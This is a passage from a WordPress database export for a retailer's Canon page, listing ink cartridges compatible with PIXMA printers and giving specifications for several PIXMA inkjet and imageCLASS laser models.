(Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-24 16:35:18','2019-09-24 08:35:18','',1449,'https://bintara.com.my/blog/2019/09/24/1449-revision-v1/',0,'revision','',0),(3310,1,'2019-09-24 16:36:10','2019-09-24 08:36:10','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" 